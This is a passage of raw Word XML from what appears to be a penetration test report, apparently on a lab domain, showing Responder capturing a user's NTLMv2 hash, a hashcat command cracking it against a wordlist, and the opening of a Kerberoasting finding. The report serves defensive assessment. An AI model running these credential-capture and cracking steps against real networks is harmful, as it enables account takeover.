                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">           NBT-NS, LLMNR &amp; MDNS Responder 3.0.6.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="054F6801" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="52559EEB" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;SNIP&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39BE7752" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5AF44620" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[+] Generic Options:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68332273" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    Responder NIC              [eth0]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CBD740A" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    Responder IP               [192.168.195.168]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B196A70" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    Challenge set              [random]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79153D79" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    Don't Respond To Names     ['ISATAP']</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EE455A6" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="58B6A389" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[+] Current Session Variables:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71AC9DA0" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    Responder Machine Name     [WIN-TWWXTGD94CV]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="062801AF" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    Responder Domain Name      [3BKZ.LOCAL]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47D5421B" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    Responder DCE-RPC Port     [47032]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B55F41A" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0B8271AD" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[+] Listening for events...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="264FA05D" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="57C7D132" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;SNIP&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27B15AF5" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="59FB4324" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[SMB] NTLMv2-SSP Client   : 192.168.195.205</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="174BA9A0" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[SMB] NTLMv2-SSP Username : INLANEFREIGHT\bsmith</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CB72808" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[SMB] NTLMv2-SSP Hash     : bsmith::INLANEFREIGHT:7ecXXXXXX98ebc:73D1B2XXXXXXXXXXX45085A651:010100000000000000B588D9F766D801191BB2236A5FAAA50000000002000800330042004B005A0001001E00570049004E002D005400570057005800540047004400390034004300560004003400570049004E002D00540057005700580054004700440039003400430056002E00330042004B005A002E004CXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX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p>
          <w:p w14:paraId="29878AA2" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4FDE2684" w14:textId="77777777" w:rsidR="003260D5" w:rsidRDefault="003260D5" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;SNIP&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="62370FF5" w14:textId="5A34B93D" w:rsidR="003260D5" w:rsidRDefault="00480C45" w:rsidP="00480C45">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Running Responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756C04D0" w14:textId="7751BD91" w:rsidR="003260D5" w:rsidRPr="00881DF1" w:rsidRDefault="00480C45" w:rsidP="003260D5">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Successfully cracking a password hash </w:t>
      </w:r>
      <w:r w:rsidR="004B0583">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidR="004B0583" w:rsidRPr="004B0583">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Hashcat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004B0583">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>to reveal the clear text password value</w:t>
      </w:r>
      <w:r w:rsidR="003260D5" w:rsidRPr="00881DF1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10800"/>
      </w:tblGrid>
      <w:tr w:rsidR="003260D5" w14:paraId="77AF1CF3" w14:textId="77777777" w:rsidTr="004539C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C01A575" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="00881DF1" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:r w:rsidRPr="00881DF1">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">hashcat -m 5600 bsmith_hash /usr/share/wordlists/rockyou.txt </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76356A1E" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="00881DF1" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7A350153" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="00881DF1" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00881DF1">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>hashcat (v6.1.1) starting...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E80B3E1" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="00881DF1" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0A8199C8" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="00881DF1" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00881DF1">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;SNIP&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28F5355F" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="00881DF1" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="620D3B53" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="00881DF1" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00881DF1">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Dictionary cache hit:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30A9D9BC" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="00881DF1" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00881DF1">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>* Filename..: /usr/share/wordlists/rockyou.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F12E16D" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="00881DF1" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00881DF1">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>* Passwords.: 14344385</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="125F1487" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="00881DF1" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00881DF1">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>* Bytes.....: 139921507</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64A33151" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="00881DF1" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00881DF1">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>* Keyspace..: 14344385</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63A7EC0E" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="00881DF1" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3C17CA0D" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="00881DF1" w:rsidRDefault="003260D5" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00881DF1">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>BSMITH::INLANEFREIGHT:7eccd965c4b98ebc:73d1b2c8c5f9861eefd31bb45085a651:010100000000000000b588d9f766d801191bb2236a5faaa50000000002000800330042004b005a0001001e00570049004e002d00540057005700580054004700440039003400430056XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX004700440039003400430056002e00330042004b005a002e004c004f00430041004c0003001400330042004b005a002e004c004f00430041004c0005001400330042004b005a002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r w:rsidRPr="00881DF1">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;REDACTED&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00881DF1">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">                                    </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0050627A" w14:textId="2A26A9E6" w:rsidR="003260D5" w:rsidRDefault="00480C45" w:rsidP="00480C45">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Cracking a Password with Hashcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C74FE2" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="00704565" w:rsidRDefault="003260D5" w:rsidP="00216BB8"/>
    <w:p w14:paraId="6C8EAC00" w14:textId="77777777" w:rsidR="003260D5" w:rsidRDefault="003260D5">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Hlk100250415"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7006E4D7" w14:textId="5DF79374" w:rsidR="00216BB8" w:rsidRPr="00520B63" w:rsidRDefault="000E6FF6" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="FindingTitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Weak Kerberos Authentication (“Kerberoasting”)</w:t>
      </w:r>
      <w:r w:rsidR="00216BB8" w:rsidRPr="006372B6">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00216BB8" w:rsidRPr="006372B6">
        <w:rPr>
          <w:color w:val="FF3E3E"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="PlainTable1"/>
        <w:tblW w:w="11016" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2358"/>
        <w:gridCol w:w="8658"/>
      </w:tblGrid>
      <w:tr w:rsidR="00216BB8" w:rsidRPr="00B96066" w14:paraId="7992219D"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53860F27" w14:textId="0CCD2792" w:rsidR="00216BB8" w:rsidRPr="007D1F5C" w:rsidRDefault="00CC3B1E" w:rsidP="00B7507B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59003F88" w14:textId="327B7D80" w:rsidR="00216BB8" w:rsidRPr="007D1F5C" w:rsidRDefault="00F60579" w:rsidP="00B7507B">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23" w:history="1">
              <w:r w:rsidR="003A7C6E" w:rsidRPr="007D1F5C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cstheme="minorHAnsi"/>
                </w:rPr>
                <w:t>CWE-522</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00216BB8" w:rsidRPr="00B96066" w14:paraId="6328DFE8"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218A9964" w14:textId="3EEDB463" w:rsidR="00216BB8" w:rsidRPr="007D1F5C" w:rsidRDefault="00CC3B1E" w:rsidP="00B7507B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>CVSS 3.1 Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D2B5A02" w14:textId="78EA4D82" w:rsidR="00216BB8" w:rsidRPr="007D1F5C" w:rsidRDefault="006B257A" w:rsidP="00B7507B">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9.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00216BB8" w:rsidRPr="00B96066" w14:paraId="0001E664"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3222B7AD" w14:textId="3AEA62DC" w:rsidR="00216BB8" w:rsidRPr="007D1F5C" w:rsidRDefault="00CC3B1E" w:rsidP="00B7507B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Description (Incl. Root Cause)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DE4724E" w14:textId="6322E2E5" w:rsidR="00216BB8" w:rsidRPr="007D1F5C" w:rsidRDefault="00DF5B46" w:rsidP="00CC3B1E">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7D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">In an Active Directory (AD) environment, Service Principal Names (SPNs) are used to uniquely identify instances of a Windows service. Kerberos authentication requires that each SPN be associated with one service account (Active Directory user account). Any authenticated AD user can request one or more Kerberos Ticket-Granting Service (TGS) tickets from the domain controller for any SPN accounts. These tickets are encrypted with the associated AD account’s NTLM password hash. They can be </w:t>
            </w:r>
            <w:r w:rsidR="001C6D4A" w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>brute forced</w:t>
            </w:r>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> offline using a password cracking tool such as Hashcat if a weak password is used along with the RC4 encryption algorithm. If AES encryption is in use, it will take more resources to “crack” a ticket to reveal the account’s clear-text password, but it is possible if weak passwords are in use.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00216BB8" w:rsidRPr="00B96066" w14:paraId="5B379108"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3F04BD0" w14:textId="1C45932F" w:rsidR="00216BB8" w:rsidRPr="007D1F5C" w:rsidRDefault="00CC3B1E" w:rsidP="00B7507B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="39" w:name="_Hlk100245307"/>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Security Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
